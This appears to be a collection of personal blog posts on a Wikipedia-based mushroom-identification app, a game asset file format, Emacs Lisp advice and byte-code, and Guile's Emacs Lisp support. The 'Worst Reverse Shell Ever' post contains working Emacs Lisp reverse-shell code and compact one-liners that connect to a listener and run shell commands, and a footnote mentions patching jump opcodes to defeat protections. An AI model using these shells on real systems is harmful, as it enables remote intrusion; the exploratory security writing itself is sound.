On Fungi and Data Stores

Warning: Rant ahead. Feel free to skip the nstore backend section.

Motivation

I’ve spent the past year looking into the fungi kingdom and the deeper I look, the weirder it gets. One barrier to entry is identifying mushrooms; there are two schools of thought:

  • Carefully observing their features and using a dichotomous key system to narrow down to a manageable set of matches. I found Michael Kuo’s website useful for this.
  • Taking a few photos and letting a neural network analyze them.

I’m not a fan of the latter approach for various reasons: you’re at the mercy of the training set’s quality, such networks are easy to subvert and they’re essentially undebuggable. I also found that Wikipedia has basic identification data on mushrooms, so I thought it would be a fun exercise to build my own web application for quickly narrowing down interesting Wikipedia articles to read. You can find the code over at https://depp.brause.cc/brause.cc/wald/, with the web application itself hosted at https://wald.brause.cc/.

Data munging

The mushroom data uses so-called mycomorphboxes to hold each species’ characteristics. Using the Wikipedia API, one can query for the latest revision of every page containing a mycomorphbox template and fetch its contents as JSON and Wiki markup.
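
A minimal sketch of what such a request could look like, with the URL assembled in Scheme; the MediaWiki API parameters are written down from memory rather than taken from the actual scraper, so treat them as an approximation:

(define mycomorphbox-query
  (string-append
   "https://en.wikipedia.org/w/api.php"
   "?action=query&format=json"
   "&generator=embeddedin&geititle=Template:Mycomorphbox&geilimit=50"
   "&prop=revisions&rvprop=content"))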

While I like writing scrapers, I dislike that the programs tend to be messy and require an online connection for every test run. I used the chance to try out the ETL pattern, that is, writing separate programs that perform the extraction (downloading data from the service without tripping API limits), transformation (massaging the data into a form that’s easier to process) and loading (putting the data into a database). I quite like it. Each part has its own unique challenges, and by sticking to a separate program I can fully focus on each one. Instead of fetching, transforming and loading the data on every run, I focus on fetching it correctly to disk, then on transforming the dump into a more useful form, then on figuring out how to load it into the database. If more patterns of that kind emerge, I can see myself writing utility libraries for them.

Data stores

There were two obvious choices for storing the data:

  • Keeping it as JSON and just writing ugly code traversing the parse tree.
  • Using SQLite because it’s a fast and reliable solution. That is, once you’ve come up with a suitable schema fitting the problem at hand.

I wanted to try out something different this time, though - something other than JSON or a relational database. Perhaps something in the NoSQL realm that’s both pleasant to use and comes with a query language. Or maybe some dumb key-value store to speed up loading and dumping the data. I ended up going with a tuple store, but I’m still considering giving graph and document databases a try. Here are some benchmark figures for querying all available filters and filtering species with a complicated query:

[wasa@box ~]$ time DB=json ./benchmark mushrooms.json >/dev/null
Filters: 14898.5027832031μs
Query stats: 1808.65561523438μs
DB=json ./benchmark mushrooms.json > /dev/null  1.37s user 0.09s system 98% cpu 1.480 total
[wasa@box ~]$ time DB=sqlite ./benchmark db.sqlite3 >/dev/null
Filters: 214.554809570313μs
Query stats: 3953.87497558594μs
DB=sqlite ./benchmark db.sqlite3 > /dev/null  0.24s user 0.01s system 96% cpu 0.253 total
[wasa@box ~]$ time DB=nstore ./benchmark db.lmdb >/dev/null
Filters: 355414.137402344μs
Query stats: 407887.70847168μs
DB=nstore ./benchmark db.lmdb > /dev/null  8.15s user 0.05s system 99% cpu 8.250 total

Bonus requirement: the storage solution should not be hardcoded, but selectable at runtime. This would hopefully not complicate things too much and encourage cleaner design. For this I came up with a simple API revolving around establishing/closing a database connection, performing a transaction on that connection and querying filters/species on a transaction.
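
A minimal sketch of what such an interface could look like, using R7RS define-record-type; the record and procedure names here are illustrative assumptions, not the actual wald API. Each field holds a procedure with the signature indicated in the comment:

(define-record-type backend
  (make-backend open close with-transaction filters species)
  backend?
  (open backend-open)                         ; location -> connection
  (close backend-close)                       ; connection -> unspecified
  (with-transaction backend-with-transaction) ; connection, (tx -> result) -> result
  (filters backend-filters)                   ; tx -> all available filters
  (species backend-species))                  ; tx, criteria -> matching species

Each storage backend constructs one such record at startup; the rest of the application only ever goes through the accessors, so whether JSON, SQLite or nstore sits behind them is decided in a single place.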

JSON backend

This was rather braindead code. It’s far from pretty, but does the job surprisingly well. Queries are acceptably fast, so it makes for a nice fallback. Initial loading time is a bit slow though; using a key-value store like LMDB would help here. Maybe it’s time for a binary Scheme serialization solution along the lines of Python’s pickle format, but without the arbitrary code execution parts.

SQLite backend

It took considerable time to get the schema right. I ended up asking another SQL expert for help with this and they taught me about EAV tables. Another oddity was that the database only performed properly after running ANALYZE once. The code itself is relatively short, but makes use of lots of string concatenation to generate the search query.
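
For illustration, here is a minimal EAV (entity-attribute-value) sketch, shown as SQL embedded in Scheme strings; the table and column names are made up for this post and are not the schema the application actually uses. The query shows one way such a search can be expressed, with every selected filter contributing its own EXISTS clause, which is where the string concatenation comes from:

(define eav-schema "
CREATE TABLE species (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE traits  (species_id INTEGER REFERENCES species(id),
                      attribute  TEXT,
                      value      TEXT);")

(define eav-query "
SELECT s.name FROM species s
 WHERE EXISTS (SELECT 1 FROM traits t WHERE t.species_id = s.id
               AND t.attribute = 'cap shape' AND t.value = 'convex')
   AND EXISTS (SELECT 1 FROM traits t WHERE t.species_id = s.id
               AND t.attribute = 'spore print' AND t.value = 'white');")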

nstore backend

Retrospectively, this was quite the rabbit hole. I ignored the warning signs, persisted and eventually got something working. But at what cost?

My original plan was to use a graph database like Neo4j. I’ve seen it used for analysis of social graphs, Active Directory networks and source code. It’s powerful, though clunky and oversized for my purposes. If I can avoid it, I’d rather not run a separate Java process and tune its garbage collection settings to play well with everything else running on my VPS. On top of that I’d need to write a database adaptor, be it for their HTTP API or the Bolt protocol. If you’re aware of a comparable in-process solution, I’d be all ears. It doesn’t even need to do graphs (the data set doesn’t have any connections), a JSON store with a powerful query language would be sufficient.

I asked the #scheme channel on Freenode about the topic of graph databases and was told that tuple stores have equivalent power, while being considerably easier to implement. SRFI-168 describes a so-called nstore and comes with a sample in-memory implementation depending on SRFI-167 and a few others. Getting it running seemed like an ideal weekend exercise. Or so I thought. I ran into the following obstacles, and weeks turned into months of drudgery:

  • The specifications themselves are of subpar quality. It seems little proofreading was done. There are minor errors in the language, several unclear parts and outright design mistakes that render parts of the library unusable. Unfortunately I noticed this long after the SRFI had been finalized. While the process allows for errata, it took some back and forth to get the most egregious faults in SRFI-167 fixed. Some faults remain in SRFI-168, and the sample implementation is incompatible with SRFI-167 due to an API change.
  • There is no such thing as a query language. You get basic pattern matching and SRFI-158 generators. Everything else, like grouping results or sorting them, you must do yourself. For this reason the nstore implementation is a bit more verbose than the JSON one. Relevant webcomic.
  • The sample implementation itself depends on several other SRFIs, most of which I had to port first. Granted, I only did this because I wanted to contribute them properly to the CHICKEN coop, but it was still bothersome. I hacked on SRFI-125, SRFI-126, SRFI-145, SRFI-146, SRFI-158, SRFI-167, SRFI-168 plus alternative versions of SRFI-125 (using a portable hash tables implementation instead of the stock one) and SRFI-167 (using LMDB for its backend).
  • Some of the SRFIs were particularly difficult to port. SRFI-125 turned out to work with neither stock hash tables (they’re incompatible with R6RS-style APIs) nor the R6RS-style hash table implementation provided by SRFI-126 (the stock implementation fails with custom comparators and the portable SRFI-69 implementation runs into an infinite loop when executing the test suite). SRFI-167 requires a custom backend for on-disk storage; I initially messed around with Sophia for this (it turned out to be unusable) and eventually settled on an LMDB-backed implementation. The SRFI-167 and SRFI-168 eggs deviate from the official APIs and have therefore not been published. For this reason only SRFI-145, SRFI-146 and SRFI-158 have been added to the coop.
  • During the time I worked on the project, some of the links pointing towards documentation, implementations and example code broke and pointed nowhere. When I communicated with the author, I got the impression they had become dissatisfied with the project and wanted to start over with a clean slate. Links have been replaced, but some code has been permanently lost. Most recently they admitted they don’t have any working implementation of SRFI-167 and SRFI-168 at hand. I consider this a deeply troubling sign for the health of the project and therefore discourage anyone from relying on it.
  • Once I actually got everything running with LMDB for the backing store, I was surprised to see awful overall performance. Even with JSON a query takes only a few milliseconds, whereas here it’s two orders of magnitude more. I did some light profiling and identified hot paths in both SRFI-128 and SRFI-167. For this reason the web application is currently using the SQLite backend.
  • The APIs themselves are kind of clumsy. I worked around this with my data storage abstraction, but it’s still something to look out for. If you compare it to clojure.jdbc or the sql-de-lite egg, there are a few obvious usability improvements to be made.
  • Eventually, after criticism from other people, withdrawing the entire SRFI was considered. It hasn’t been withdrawn so far, as the process requires a replacement SRFI. I believe this to be a mistake.
  • The SRFI process in general has accelerated in the last few years due to R7RS-large making heavy use of it for its dockets. There is the occasional SRFI among them that is too ambitious in scope and bound to become outdated. I believe this to be an abuse of the standardization process; instead there should be experimentation on a decoupled platform such as Snow or Akku. Once a project has been approved by the community and implemented by several Scheme systems, it can be considered for standardization. The pre-srfi repository lists a few upcoming projects of that kind, such as HTTP servers/clients, a P2P network proposal, a web UI library and Emacs-style text manipulation. I’m doubtful they will be anywhere near as successful as existing non-portable Scheme libraries.

Needless to say, I’ve become increasingly frustrated over time. To the SRFI-168 author’s credit, they’ve always been civil, recognized the design mistakes and are working on a less ambitious replacement library. While I do regret the time that went into this adventure, I have learned a few lessons:

  • LMDB and key-value stores in general are great. They’re easy to comprehend, have fast load times and can be a quick and dirty solution when dealing with relational models is complete overkill. I’m not sure whether ordered key-value stores are worth it though.
  • While it’s true that tuple stores are roughly equivalent in power to graph databases, graph databases still have the edge. Mind you though, this piece has been written by a Neo4j person, so it’s most likely biased. Still, I’m inclined to believe their claims.
  • Portable code is cool, but it cannot compete with highly tuned solutions. Do not expect a sample implementation of a database to rival SQLite and friends.

Web frontend

I assumed this part would be way harder, but it only took me two days of hacking without any sort of web framework backing it. I do miss some of the conveniences I learned from writing Clojure web applications though:

  • I had to write my own database abstraction instead of using clojure.jdbc and a connection string. On top of that there’s ugly code to detect which database to use and perform a dynamic import.
  • Stuart Sierra’s component library gives you easy dependency injection. For example you can access configuration and database connections from an HTTP handler directly instead of having to use global or dynamically bound variables.
  • A ring-style API with a request/response alist and middleware manipulating them would improve discoverability considerably; a sketch of the idea follows below. It’s no deal breaker though.
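
A minimal sketch of that ring-style idea, translated to Scheme; the alist keys and procedure names are illustrative only and not taken from any existing library:

;; A handler maps a request alist to a response alist.
(define (hello-handler request)
  `((status . 200)
    (body . ,(string-append "Hello, " (cdr (assq 'remote-addr request))))))

;; Middleware is just a procedure wrapping a handler and returning a new one.
(define (wrap-logging handler)
  (lambda (request)
    (let ((response (handler request)))
      (display (cdr (assq 'uri request)))
      (display " -> ")
      (display (cdr (assq 'status response)))
      (newline)
      response)))

(define app (wrap-logging hello-handler))
;; (app '((uri . "/species") (remote-addr . "127.0.0.1")))
;; prints "/species -> 200" and returns the response alist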

Further thoughts

I’d have expected this project to suck any remaining enthusiasm for writing web applications out of me, but it didn’t. While I’m not sure whether I’ll stick to Scheme for them, I could see myself doing another one soonish. I think I’ll abstain from investing more time into databases though and hack on something else for the time being.


Lost In Space

My relationship with games is complicated. I never had the chance to get good at them and few I’ve played have been any good. Despite that, I had both the urge to complete games and the urge to discover how they work internally. As nearly all commercially developed games happen to be proprietary, I focused on viewing and extracting their asset files, an art not unlike reverse engineering of executable files.

Fast-forward many years and I still occasionally play games. At least I have proper tools at hand now and the knowledge to make sense of binary formats. Another plus is that people have discovered the benefits of the open source spirit and collaborate and share their knowledge online. Recently I’ve taken a closer look at a certain meme game in my Steam library. Many of its assets (music, sound effects, fonts and a single texture) are stored as regular files on disk; however, there’s a 79M asset file, presumably holding the missing textures for the game sprites and backgrounds. This blog post will explore its custom format and inner workings in enough detail to write your own extraction program.

Reconnaissance

For starters I opened the file in my favorite hex editor and browsed through it, looking for obvious patterns such as human-readable strings, repetitive byte sequences and anything not looking like random noise. I found the following:

  • A very short header that doesn’t contain any human-readable file signatures.
  • Several file paths, each terminated with a null byte.
  • Several 16-byte entries, with columns lining up almost perfectly.
  • Several concatenated files, identified by file signatures for the WebP, PNG and XML formats.

Here are some screenshots, with the relevant patterns highlighted:

Header and paths section:

/img/nyancat-header-paths.png

Mysterious 16-byte entries, with many even-numbered columns being zeroes[1]:

/img/nyancat-index-patterns.png

WebP file header in files section:

/img/nyancat-files-webp.png

XML file header in files section:

/img/nyancat-files-xml.png

PNG file header in files section:

/img/nyancat-files-png.png

Given the information so far, several hypotheses can be established:

  • The number of paths is the same as the number of embedded files and every path corresponds to an embedded file.
  • The file contains information about how long each embedded file is.
  • The mystery section (which I’ll call the index from now on) contains that information in each of its 16-byte entries.
  • Each of these entries corresponds to a path and embedded file.
  • The association between path, entry and embedded file is ordered, for example the first path corresponds to the first entry and first embedded file.

Verification

Each hypothesis can be checked with basic arithmetic. The most fundamental assumptions the format relies upon are that the number of paths, index entries and embedded files is the same, and that the length of each embedded file is stored somewhere else in the file, presumably the index section. I decided to start with the latter, for which I picked the first embedded file, a WebP image[2]. Its length can be determined by looking at bytes 4 to 7, decoding them as an unsigned little-endian 32-bit integer and adding 8 to include the length of the preceding header. The obtained length can be verified by seeking to the beginning of the embedded file in the hex editor, then seeking forward by the length[3] and checking whether that position corresponds to the start of the next file. Likewise, the length of a PNG file can be obtained by looking for the IEND sequence followed by a 32-bit checksum, and for XML files by looking for the closing tag.
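
As a sketch, here is that computation in portable R7RS Scheme (read-u8 is from (scheme base)); this is illustrative only, not the extraction program developed later:

(define (read-le32 port)          ; unsigned little-endian 32-bit integer
  (let* ((b0 (read-u8 port)) (b1 (read-u8 port))
         (b2 (read-u8 port)) (b3 (read-u8 port)))
    (+ b0 (* 256 b1) (* 65536 b2) (* 16777216 b3))))

(define (webp-length port)
  (read-le32 port)                ; consume the "RIFF" magic
  (+ 8 (read-le32 port)))         ; stored size + 8 bytes of RIFF header

;; Applied to a port positioned at the start of an embedded WebP file,
;; this yields the total length of that file.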

The first file is 2620176 bytes long and is immediately followed by an XML file describing it. That length corresponds to either 0027fb10 or 10fb2700 when encoded as hex, depending on whether it’s big- or little-endian. And indeed, the latter value shows up in the last 4 bytes of the first 16-byte entry. I then verified that this property holds by extracting the file length from the second 16-byte entry and applying it to the second embedded file.

This left verifying the number of embedded files by counting the number of paths and entries in their respective sections. I found 335 of them in each, represented as 4f010000 using the previously encountered little-endian hex notation. That number corresponds to bytes 4 to 7 in the header, leaving two 4-byte numbers around it. I haven’t been able to deduce the meaning of the preceding one, but the succeeding one is a6210000, which corresponds to 8614, the length of all paths immediately following the file header. That gave me all the information necessary to extract the assets.

Extraction

The file format deduced so far:

# header
#   4-byte integer (unknown)
#   4-byte integer (number of filenames)
#   4-byte integer (length of filenames section)
# paths
#   null terminated string (path)
#   repeat count times
# index
#   4-byte integer (unknown)
#   4-byte integer (unknown)
#   4-byte integer (unknown)
#   4-byte integer (file length)
#   repeat count times
# data
#   file length bytes
#   repeat count times

Expressed in pseudo code:

read_integer()
filenames_count = read_integer()
filenames_length = read_integer()
filenames = read_bytes(filenames_length).split("\x00")
index = []

for i in range(filenames_count):
    read_integer()
    read_integer()
    read_integer()
    file_length = read_integer()
    index[i] = [filenames[i], file_length]

for entry in index:
    filename, file_length = entry
    data = read_bytes(file_length)
    write_bytes(filename, data)

A reward you’ve earned:

/img/nyancat-texture-yodacat.png

Further thoughts

Performing the analysis and writing the extraction program took me a few hours. It could have been a lot trickier, especially if my goal had been game modding. That would require extracting the files, modifying them, then repacking them into the asset file without the game noticing a change. To do this safely, it’s necessary to perform deeper analysis of the unknown fields, for example by looking into other matching metadata of every embedded file or by reverse engineering the game itself.

Another common problem is that data doesn’t always form clear patterns, for example if it’s encrypted, compressed or random-looking for other reasons. Sometimes formats are optimized towards programmer convenience and may store data necessary to verify the asset file inside the game instead. This would again not pose a challenge to a reverse engineer, but would still complicate automatic extraction.

Sometimes team work is necessary. Chances are that tools have been developed for popular games and may only need minor adjustments to get working again. One resource I’ve found immensely helpful to gain a better understanding of common patterns is The Definitive Guide To Exploring File Formats.

[1]radare2 can shift the file contents around in visual mode by using the h and l movement keys. This is useful to force the entries to align into the expected columns.
[2]The first path suggests a PNG file, but the first embedded file uses the WebP format. This threw me off for a while; my working theory is that the artist mislabeled WebP files as PNGs and the game engine they’ve used auto-detected their contents without any hitch. Good for them!
[3]radare2 offers the s+ command for this purpose.

A Piece of Advice

Update: Added a helpful link explaining more opcodes.

Note: This is an expanded version of this Reddit post.

Advice is one of those Emacs Lisp features that you don’t see often in other programming languages. It enables you to extend almost any function you’d like by executing code before/after/instead of it and messing with arguments/return values. But how does it work? And which of the two implementations of it should be used?

On advice.el

Somewhat surprisingly, advice.el consists of more than 3000 lines, but more than half of them are comments. It doesn’t quite reach literate-programming levels of commentary, but it explains its internals and includes a small tutorial demonstrating how it works. There are many bells and whistles, but to keep things simple I’ll focus on the part of the tutorial that changes a function to manipulate its argument before execution of the function body. That body can be programmatically obtained using symbol-function:

(defun foo (x)
  "Add 1 to X."
  (1+ x))

(symbol-function 'foo)
;; => (lambda (x) "Add 1 to X." (1+ x))

The example advice fg-add2 adds one to x again before the actual code is run:

(defadvice foo (before fg-add2 first)
  "Add 2 to X."
  (setq x (1+ x)))

(symbol-function 'foo)
;; #[128 "<bytecode>"
;;   [apply ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x)) nil]
;;   5 nil]

Yikes. How does one make sense of the byte-code?

Interlude: Byte-code disassembly

Emacs Lisp contains two interpreters, a tree walker (takes an s-exp as input, walks along it and evaluates the branches) and a byte-code interpreter (takes byte-code, interprets it using a stack VM). bytecomp.el and byte-opt.el transform s-expressions into optimized byte-code. I can recommend studying these to understand how a simple compiler works. The result of this is code expressed in a stack-oriented fashion using up to 256 fundamental operations[1]. One can look at it with the disassemble function, which accepts both function symbols and function definitions:

(disassemble (lambda () 1))
;; byte code:
;;   args: nil
;; 0       constant  1
;; 1       return

What happens here is that the constant 1 is pushed to the stack, then the top of stack is returned. Arguments are treated in a similar manner:

(disassemble (lambda (x) x))
;; byte code:
;;   args: (x)
;; 0       varref    x
;; 1       return

Instead of putting a constant on the stack, the value of x is looked up and pushed to the stack. Finally, an easy function call looks as follows:

(disassemble (lambda (a b) (message "%S: %S" a b)))
;; byte code:
;;   args: (a b)
;; 0       constant  message
;; 1       constant  "%S: %S"
;; 2       varref    a
;; 3       varref    b
;; 4       call      3
;; 5       return

Four values are pushed on the stack in function call order, then a function is called with three arguments. The four stack values are replaced with its result, then returned. We’re almost ready to tackle the actually interesting disassembly now and can look up all other unknown opcodes in this unofficial manual.

You may wonder though, why bother? Why not just use a decompiler? Or even avoid dealing with byte-compiled code in the first place… It turns out there are a few reasons for bothering:

  • Ideally you’d always have access to source code, but that is not always an option. For example it’s not unheard of for an Emacs installation to only ship byte-compiled sources (hello Debian). Likewise, defining advice as above will byte-compile the function. Byte-code compilation is done as a performance enhancement, and backtraces from optimized functions will contain byte-code.
  • The byte-code decompiler we have is clunky and incomplete. It sometimes fails to make sense of byte-code, meaning you cannot rely on it. Another thing to consider is that byte-code doesn’t have to originate from the official byte-code compiler; there are other projects generating byte-code that the decompiler may not target. Suppose someone wants to thwart analysis of (presumably malicious) code; hand-written byte-code would be an option.
  • Sometimes byte-code is studied to understand the performance of an Emacs Lisp function. It’s easier to reason about byte-code than regular code, especially to see the effects of lexical binding.
  • It’s educational to wade through bytecode.c and other Emacs internals. While there isn’t too much benefit in understanding Emacs byte-code itself, the same lessons apply to other stack-oriented VMs, such as the JVM. Learning this makes reversing proprietary programs targeting the JVM (such as Android apps) much easier and enables advanced techniques such as binary patching[2].

On advice.el (continued)

We’re ready to unravel what foo does:

(disassemble 'foo)
;; byte code for foo:
;;   args: (x)
;; 0       constant  apply
;; 1       constant  ad-Advice-foo
;; 2       constant  (lambda (x) "Add 1 to X." (1+ x))
;; 3       stack-ref 3
;; 4       call      3
;; 5       return

apply, ad-Advice-foo and a lambda are placed on the stack. Then, stack element 3 (zero-indexed) is pushed on top of the stack. We already know that elements 0, 1 and 2 are the three constants; element 3, however, is the first argument passed to the function. As it turns out, when lexical binding is enabled, the stack-ref opcode is used instead of varref. Therefore the byte-code presented is equivalent to (lambda (&rest arg) (apply 'ad-Advice-foo (lambda (x) "Add 1 to X." (1+ x)) arg)). You can verify this by disassembling that lambda and comparing the output with the previous disassembly.

What does ad-Advice-foo do though?

(disassemble 'ad-Advice-foo)
;; byte code for ad-Advice-foo:
;;   args: (ad--addoit-function x)
;; 0       constant  nil
;; 1       varbind   ad-return-value
;; 2       varref    x
;; 3       add1
;; 4       varset    x
;; 5       varref    ad--addoit-function
;; 6       varref    x
;; 7       call      1
;; 8       dup
;; 9       varset    ad-return-value
;; 10      unbind    1
;; 11      return

This is a bit more to unravel. varbind introduces a temporary variable, unbind undoes this binding, varset is equivalent to set and dup pushes a copy of the top of the stack (kind of like stack-ref 0 would do). The sequence of constant nil and varbind ad-return-value is the same as (let ((ad-return-value nil)) ...). x is retrieved, incremented by 1 and set to the result of that, therefore (setq x (1+ x)). Then ad--addoit-function is called with x as argument. The result of that is duplicated and ad-return-value is set to it. Finally, unbind 1 undoes the most recent special binding, that of the temporary variable. Therefore the byte-code is equivalent to (let (ad-return-value) (setq x (1+ x)) (setq ad-return-value (funcall ad--addoit-function x))). Let’s see how nadvice.el fares.

On nadvice.el

It’s tiny compared to advice.el, at only 391 lines of code. To nobody’s surprise it lacks bells and whistles such as changing argument values directly or defining advice without activating it immediately. Therefore some adjustments are required to create the equivalent advice with it:

(defun foo-advice (args)
  (mapcar '1+ args))

(advice-add 'foo :filter-args 'foo-advice)

(symbol-function 'foo)
;; #[128 "<bytecode>" [apply foo-advice (lambda (x) "Add 1 to X." (1+ x)) nil] 5 nil]

(disassemble 'foo)
;; byte code for foo:
;;   args: (x)
;; 0       constant  apply
;; 1       constant  (lambda (x) "Add 1 to X." (1+ x))
;; 2       constant  foo-advice
;; 3       stack-ref 3
;; 4       call      1
;; 5       call      2
;; 6       return

We have our three constants and x on the stack. First a function is called with one argument: that’s foo-advice with x (which represents the argument list). Then a function is called with two arguments: that’s apply with the lambda and the result of the previous call. In other words, (lambda (&rest x) (apply (lambda (x) "Add 1 to X." (1+ x)) (foo-advice x))). It was a bit less convenient to write, but far easier to understand.

Conclusion

nadvice.el is surprisingly elegant, striking a good balance between amount of overall features and technical simplicity. Unless you maintain a package that must keep compatibility with Emacs 24.3 or earlier, I don’t see a good reason to go for advice.el.

[1]Or in short, opcode. A byte represents up to 256 values, hence the “byte-code” name.
[2]Simple protections rely on checking a conditional and executing good/bad code. This tends to compile down to a conditional jump. Switch out the jump opcode for the opposite one and it will execute bad/good code instead…

Worst Reverse Shell Ever

Every now and then there’s someone asking about Emacs and security, especially when it comes to the question whether one can trust packages. Short answer: No. Long answer: This question cannot be answered without defining a threat model first, but honestly, who is going to bother backdooring an Emacs package?

Yet some lingering doubt remains. There are Emacs users after all who are high-profile enough to bother attacking. Suppose you wanted to write malware in Emacs Lisp: one obvious thing to try after gaining the ability to execute arbitrary code is a remote shell to comfortably execute commands on someone else’s computer. There are two flavors of them:

Bind shell:
The victim computer listens on LPORT and the attacker connects to LHOST:LPORT. Any user input from the attacker is sent to a local shell, output from that shell is returned to the attacker.
Reverse shell:
The victim computer establishes a connection to the attacker listening at RHOST:RPORT. Much like with the bind shell, user input from the attacker is interpreted by a local shell.

Reverse shells are more popular as they allow circumventing restrictive firewall rules. There are several cheatsheets for spawning them with a Bash/Python/Ruby/Perl/… oneliner; most of those rely on creating a socket, extracting its file descriptor and wiring it up to a shell process. Unfortunately Emacs doesn’t give you that information, so I had to settle for a less elegant approach. Here’s my first attempt using shell-command-to-string to execute the received process output and process-send-string to send it back to the process[1]:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080)))
  (set-process-filter r (lambda (p s)
                          (process-send-string p (shell-command-to-string s))))
  (read-char))

To test it, launch nc -nlvp 8080 (for GNU netcat) or nc -nlv 8080 (for BSD netcat), save the above to test.el and run emacs --script test.el. It works, but is sub-optimal for a few reasons:

  • A new shell is spawned every time a batch of user input has been read. Due to this, changing the directory doesn’t appear to have any effect.
  • The shell seems unresponsive when executing commands generating large output (for example find /) as shell-command-to-string collects everything before returning the entirety of it.
  • If the chunk of user input received by the process filter doesn’t resemble a valid shell command (for example by being broken up at an inconvenient spot), it won’t be executed as expected and might raise an incomprehensible error.

To fix these issues a dedicated shell subprocess needs to be created. Output from the network process is sent to the shell subprocess and vice versa. This makes for slightly longer code:

(let ((r (make-network-process :name "r"
                               :host "127.0.0.1"
                               :service 8080))
      (c (start-process "s" nil "sh" "-i")))
  (set-process-filter r (lambda (_ s) (process-send-string c s)))
  (set-process-filter c (lambda (_ s) (process-send-string r s)))
  (read-char))

Voila, cd works as expected and the hangs for find / are gone as well. Time to optimize both for shell oneliners; for that I eliminate whitespace and carefully adjust the logic[2]:

emacs --batch --eval '(set-process-filter(make-network-process :name"r":host"127.0.0.1":service 8080)(lambda(p s)(process-send-string p (shell-command-to-string s))))' -f read-char
emacs --batch --eval '(progn(setq r(make-network-process :name"r":host"127.0.0.1":service 8080)c(start-process"s"nil"sh""-i"))(set-process-filter r(lambda(_ x)(process-send-string c x)))(set-process-filter c(lambda(_ x)(process-send-string r x))))' -f read-char

These clock in at 180 and 261 chars respectively. Not too shabby compared to the usual Python/Ruby/Perl oneliners (243/104/216 chars). Unlike them, though, I cannot upgrade the reverse shell to a fully interactive one. But who knows, maybe they’ll come in useful some day if I ever encounter a machine that has no common programming languages installed, but does have Emacs for some reason…

[1]Originally this used (while t (sleep-for 0.1)), but thblt pointed out (read-char) as shorter alternative. Bonus: As it’s the last form and takes no arguments, it can be invoked from the Emacs command line with -f read-char.
[2]An obvious optimization I’ve not ended up doing is using something like (fset 's 'process-send-string) to shorten any lengthy identifiers used more than once; however it doesn’t pay off, as the code now contains both single and double quotes. While it is possible to write a shell oneliner with them, extra attention must be paid to quote both kinds correctly. Unless one uses something like the printf command or bash’s $'O\'connor.' notation, escaping the four single quotes ends up requiring more characters than without the optimization.

State of Emacs Lisp on Guile

Update: Factual corrections to Robin Templeton’s work.

Update: Added an extra set of benchmarks for Guile 3 in a Debian Sid Docker container.

Disclaimer: I don’t use Guile. I hardly know it. There are other Scheme implementations I know far better. But since Guile Emacs is a hot topic with many hopes and unproven claims attached to it, I experiment with it every now and then. All “benchmark” results here are to be taken with caution; they’ve been created using Guile 2.2.6 and Emacs 26.3 on a Thinkpad X230t running Arch Linux.

With that out of the way, laurus from #emacs[1] reminded me that one of the reasons why Guile Emacs was possible in the first place is Guile’s language tower, with Emacs Lisp being one of the supported languages. But what does that mean? How complete is the Emacs Lisp support? What can it be used for? These and a few other questions are the topic of this blog post.

In need of a spec

Standardized programming languages have the great benefit of being based on a specification one can consult whenever in doubt of how things are supposed to behave. This allows several competing implementations to be developed, each with their own unique strengths and benefits. If you adhere to the standard, switching between implementations isn’t hard and can help shake out bugs, for example when compiling your C programs with different compilers.

Things get considerably harder if your chosen language forgoes this approach and the correct behavior is whatever the canonical implementation does; yet this didn’t stop people from writing alternative implementations of programming languages such as Python and Ruby. Emacs Lisp has been in a similar situation ever since Guile was extended to the point of supporting Emacs Lisp as an additional language. Provided your version of Guile is new enough, you can evaluate trivial code in the REPL:

scheme@(guile-user)> (define foo 1)
scheme@(guile-user)> foo
$1 = 1
scheme@(guile-user)> ,L elisp
Happy hacking with Emacs Lisp!  To switch back, type `,L scheme'.
elisp@(guile-user)> (defvar bar 2)
$2 = bar
elisp@(guile-user)> bar
$3 = 2

So far so good. But how much of Emacs Lisp is supported? Not much, apparently: many common functions like message and error are unbound. It doesn’t seem possible to do anything with buffers or files either. This greatly limits the possibilities of writing useful scripts in Emacs Lisp[2]. One way of determining what exactly is supported would be consulting the source code, but where’s the fun in that when you could instead test it programmatically, thereby creating an executable spec…

Generating the spec

The usual test approaches fail me. Reading test inputs via stdin with read-string? Accessing the arguments with argv? Reading from a file with insert-file-contents? Obtaining an environment variable with getenv? None of that is supported. At least you can print to stdout with princ. So I went for a slightly different approach: obtain a list of functions/variables[3] in a minimal Emacs environment, then generate a test file that checks their existence and prints a test summary. Here’s the code generation part:

(defun printf (fmt &rest args)
  (princ (apply 'format fmt args)))

(printf ";; elisp spec adherence test
(defvar passed 0)
(defvar failed 0)
(defun test-sym (pred sym)
  (if (funcall pred sym)
      (setq passed (1+ passed))
    (setq failed (1+ failed))))
(defun test-fun (sym) (test-sym 'fboundp sym))
(defun test-var (sym) (test-sym 'boundp sym))\n\n")

(mapatoms
 (lambda (atom)
   (when (fboundp atom)
     (printf "(test-fun '%S)\n" atom))
   (when (and (not (keywordp atom)) (boundp atom))
     (printf "(test-var '%S)\n" atom))))

(printf "\n")
(printf "(princ \"Passed: \")\n")
(printf "(princ passed)\n")
(printf "(terpri)\n")
(printf "\n")
(printf "(princ \"Failed: \")\n")
(printf "(princ failed)\n")
(printf "(terpri)\n")

Assuming it’s been saved as gen-elisp-spec.el, the executable spec itself is generated with emacs -Q --batch --script gen-elisp-spec.el > elisp-spec.el. Here’s a test session using Emacs and Guile:

[wasa@box ~]$ time emacs -Q --batch --script elisp-spec.el
Passed: 9567
Failed: 2
emacs -Q --batch --script elisp-spec.el  0.10s user 0.02s system 99% cpu 0.117 total
[wasa@box ~]$ time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 9432
guile --language=elisp elisp-spec.el  77.62s user 0.27s system 103% cpu 1:15.04 total

This is kind of surprising. I didn’t expect Emacs to fail its own test and didn’t expect Guile to implement this little either. Most surprising is the abysmal speed of the test[4]; I’m looking forward to anyone being able to explain that part to me. Here’s one more test using the official Debian Sid Docker image with Emacs 26.3 and Guile 3.0.2:

root@d27668492764:/# time emacs -Q --batch --script elisp-spec.el
Passed: 9108
Failed: 2

real    0m0.104s
user    0m0.097s
sys     0m0.007s
root@d27668492764:/# time guile --language=elisp elisp-spec.el
Passed: 137
Failed: 8973

real    6m20.950s
user    10m32.294s
sys     0m7.846s

This is not exactly an improvement. At least the numbers are small enough to print out the offending symbols: for Emacs it’s atom and printf (which polluted the test environment); for Guile I’ve taken the liberty of annotating the list:

;; binding
let let*
;; functions
lambda apply funcall
;; evaluation
eval load eval-and-compile eval-when-compile
;; sequences
aref aset make-vector nth
;; sequencing
progn prog2 prog1
;; iteration
dolist while
;; control flow
